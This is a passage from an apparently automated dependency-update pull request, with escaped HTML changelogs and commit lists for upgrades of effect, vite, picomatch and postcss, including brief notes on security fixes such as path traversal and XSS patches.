href=\"https://github.com/Effect-TS/effect/commit/12b1f1eadf649e30dec581b7351ba3abb12f8004\"\u003e\u003ccode\u003e12b1f1e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - prevent Stream.changes from writing empty chunks\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eeffect@3.19.17\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6040\"\u003e#6040\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/a8c436f7004cc2a8ce2daec589ea7256b91c324f\"\u003e\u003ccode\u003ea8c436f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/jacobconley\"\u003e\u003ccode\u003e@​jacobconley\u003c/code\u003e\u003c/a\u003e! - Fix \u003ccode\u003eStream.decodeText\u003c/code\u003e to correctly handle multi-byte UTF-8 characters split across chunk boundaries.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Effect-TS/effect/blob/main/packages/effect/CHANGELOG.md\"\u003eeffect's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.20.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6124\"\u003e#6124\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/8798a843218e6c0c0d3a8eee83360880e370b4da\"\u003e\u003ccode\u003e8798a84\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mikearnaldi\"\u003e\u003ccode\u003e@​mikearnaldi\u003c/code\u003e\u003c/a\u003e! - Fix scheduler task draining to isolate \u003ccode\u003eAsyncLocalStorage\u003c/code\u003e across fibers.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6107\"\u003e#6107\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/fc82e81448bd9136a37580139ce46a2c61b11b54\"\u003e\u003ccode\u003efc82e81\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Backport \u003ccode\u003eTypes.VoidIfEmpty\u003c/code\u003e to 3.x\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6088\"\u003e#6088\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/82996bce8debffcb44feb98bb862cf2662bd56b7\"\u003e\u003ccode\u003e82996bc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003eSchema.omit\u003c/code\u003e producing wrong result on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and index signatures\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003egetIndexSignatures\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e and \u003ccode\u003egetPropertyKeyIndexedAccess\u003c/code\u003e. Previously, \u003ccode\u003eSchema.omit\u003c/code\u003e on a struct combining \u003ccode\u003eSchema.optionalWith\u003c/code\u003e (with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, etc.) and \u003ccode\u003eSchema.Record\u003c/code\u003e would silently take the wrong code path, returning a Transformation with property signatures instead of a TypeLiteral with index signatures.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6086\"\u003e#6086\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4d97a61a15b9dd6a0eece65b8f0c035e16d42ada\"\u003e\u003ccode\u003e4d97a61\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003egetPropertySignatures\u003c/code\u003e crash on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and other Transformation-producing variants\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eSchemaAST.getPropertyKeyIndexedAccess\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e. Previously, calling \u003ccode\u003egetPropertySignatures\u003c/code\u003e on a \u003ccode\u003eSchema.Struct\u003c/code\u003e containing \u003ccode\u003eSchema.optionalWith\u003c/code\u003e with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, \u003ccode\u003e{ nullable: true }\u003c/code\u003e, or similar options would throw \u003ccode\u003e\u0026quot;Unsupported schema (Transformation)\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6097\"\u003e#6097\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/f6b0960bf3184109920dfed16ee7dfd7d67bc0f2\"\u003e\u003ccode\u003ef6b0960\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Fix TupleWithRest post-rest validation to check each tail index sequentially.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.19\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - add short circuit to fiber.await internals\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - build ManagedRuntime synchronously if possible\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6081\"\u003e#6081\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/2d2bb1364a906bd44800c6387b9575fddccdaf53\"\u003e\u003ccode\u003e2d2bb13\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - fix semaphore race condition where permits could be leaked\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.18\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6062\"\u003e#6062\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/12b1f1eadf649e30dec581b7351ba3abb12f8004\"\u003e\u003ccode\u003e12b1f1e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - prevent Stream.changes from writing empty chunks\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.17\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6040\"\u003e#6040\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/a8c436f7004cc2a8ce2daec589ea7256b91c324f\"\u003e\u003ccode\u003ea8c436f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/jacobconley\"\u003e\u003ccode\u003e@​jacobconley\u003c/code\u003e\u003c/a\u003e! - Fix \u003ccode\u003eStream.decodeText\u003c/code\u003e to correctly handle multi-byte UTF-8 characters split across chunk boundaries.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.16\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6018\"\u003e#6018\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/e71889f35b081d13b7da2c04d2f81d6933056b49\"\u003e\u003ccode\u003ee71889f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/codewithkenzo\"\u003e\u003ccode\u003e@​codewithkenzo\u003c/code\u003e\u003c/a\u003e! - fix(Match): handle null/undefined in \u003ccode\u003eMatch.tag\u003c/code\u003e and \u003ccode\u003eMatch.tagStartsWith\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eAdded null checks to \u003ccode\u003ediscriminator\u003c/code\u003e and \u003ccode\u003ediscriminatorStartsWith\u003c/code\u003e predicates to prevent crashes when matching nullable union types.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/aa473938a53d07837e84935329f4891a7d591c3b\"\u003e\u003ccode\u003eaa47393\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6089\"\u003e#6089\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/8798a843218e6c0c0d3a8eee83360880e370b4da\"\u003e\u003ccode\u003e8798a84\u003c/code\u003e\u003c/a\u003e fix(effect): isolate scheduler runners per fiber (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6124\"\u003e#6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/fc82e81448bd9136a37580139ce46a2c61b11b54\"\u003e\u003ccode\u003efc82e81\u003c/code\u003e\u003c/a\u003e Backport \u003ccode\u003eTypes.VoidIfEmpty\u003c/code\u003e to 3.x (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6107\"\u003e#6107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/f6b0960bf3184109920dfed16ee7dfd7d67bc0f2\"\u003e\u003ccode\u003ef6b0960\u003c/code\u003e\u003c/a\u003e Backport: Fix TupleWithRest post-rest index drift validation bug (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6097\"\u003e#6097\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/82996bce8debffcb44feb98bb862cf2662bd56b7\"\u003e\u003ccode\u003e82996bc\u003c/code\u003e\u003c/a\u003e fix(Schema): handle Transformation in getIndexSignatures for correct omit beh...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/4d97a61a15b9dd6a0eece65b8f0c035e16d42ada\"\u003e\u003ccode\u003e4d97a61\u003c/code\u003e\u003c/a\u003e Schema: fix getPropertySignatures crash on Struct with optionalWith({ default...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/ab3b64c20a039eb4d573fe757c41278925b22687\"\u003e\u003ccode\u003eab3b64c\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6080\"\u003e#6080\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/2d2bb1364a906bd44800c6387b9575fddccdaf53\"\u003e\u003ccode\u003e2d2bb13\u003c/code\u003e\u003c/a\u003e fix semaphore race condition where permits could be leaked (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6081\"\u003e#6081\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e build ManagedRuntime synchronously if possible (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6079\"\u003e#6079\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/4f2107548fa64c21a8643b7b0efcd556cd16d4b9\"\u003e\u003ccode\u003e4f21075\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6063\"\u003e#6063\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Effect-TS/effect/commits/effect@3.20.0/packages/effect\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 7.3.1 to 7.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/releases\"\u003evite's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.3.2\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e\u003ca href=\"https://github.com/vitejs/vite/compare/v7.3.1...v7.3.2\"\u003e7.3.2\u003c/a\u003e (2026-04-06)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eavoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22161\"\u003e#22161\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e09d8c90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ebackport \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22162\"\u003e#22162\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e19db0f2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22160\"\u003e#22160\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003ef8103cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/cc383e07b66d4c5a9768fcb570e0af812cb8d999\"\u003e\u003ccode\u003ecc383e0\u003c/code\u003e\u003c/a\u003e release: v7.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e\u003ccode\u003e09d8c90\u003c/code\u003e\u003c/a\u003e fix: avoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22161\"\u003e#22161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003e\u003ccode\u003ef8103cc\u003c/code\u003e\u003c/a\u003e fix: check \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22160\"\u003e#22160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e\u003ccode\u003e19db0f2\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22162\"\u003e#22162\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/vitejs/vite/commits/v7.3.2/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e\nand this project adheres to \u003ca href=\"http://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003eChangelogs are for humans, not machines.\u003c/li\u003e\n\u003cli\u003eThere should be an entry for every single version.\u003c/li\u003e\n\u003cli\u003eThe same types of changes should be grouped.\u003c/li\u003e\n\u003cli\u003eVersions and sections should be linkable.\u003c/li\u003e\n\u003cli\u003eThe latest version comes first.\u003c/li\u003e\n\u003cli\u003eThe release date of each versions is displayed.\u003c/li\u003e\n\u003cli\u003eMention whether you follow Semantic Versioning.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eChangelog entries are classified using the following labels \u003cem\u003e(from \u003ca href=\"http://keepachangelog.com/\"\u003ekeep-a-changelog\u003c/a\u003e\u003c/em\u003e):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAdded\u003c/code\u003e for new features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eChanged\u003c/code\u003e for changes in existing functionality.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDeprecated\u003c/code\u003e for soon-to-be removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemoved\u003c/code\u003e for now removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFixed\u003c/code\u003e for any bug fixes.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSecurity\u003c/code\u003e in case of vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e4.0.0 (2024-02-07)\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bad text values in parse \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/126\"\u003e#126\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/connor4312\"\u003e\u003ccode\u003e@​connor4312\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove process global to work outside of node \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/129\"\u003e#129\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/styfle\"\u003e\u003ccode\u003e@​styfle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd sideEffects to package.json \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/128\"\u003e#128\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/frandiox\"\u003e\u003ccode\u003e@​frandiox\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved \u003ccode\u003eos\u003c/code\u003e, make compatible browser environment. See \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/124\"\u003e#124\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/gwsbhqt\"\u003e\u003ccode\u003e@​gwsbhqt\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/81cba8d4b767cab3cb29d26eb4f691eed75b73b2\"\u003e\u003ccode\u003e81cba8d\u003c/code\u003e\u003c/a\u003e Publish 2.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/fc1f6b69006e9435caf8fb40d8aff378bc0b7bce\"\u003e\u003ccode\u003efc1f6b6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/eec17aee5428a7249e9ca5adbb8a0d28fa29619b\"\u003e\u003ccode\u003eeec17ae\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/78f8ca4362d9e66cadea97b93e292f10096452ed\"\u003e\u003ccode\u003e78f8ca4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/156\"\u003e#156\u003c/a\u003e from micromatch/backport-144\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/3f4f10eaa65bf3a52e8f2999674cd27e11fa3c9b\"\u003e\u003ccode\u003e3f4f10e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/144\"\u003e#144\u003c/a\u003e from Jason3S/jdent-object-properties\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `postcss` from 8.5.6 to 8.5.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/releases\"\u003epostcss's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/blob/main/CHANGELOG.md\"\u003epostcss's 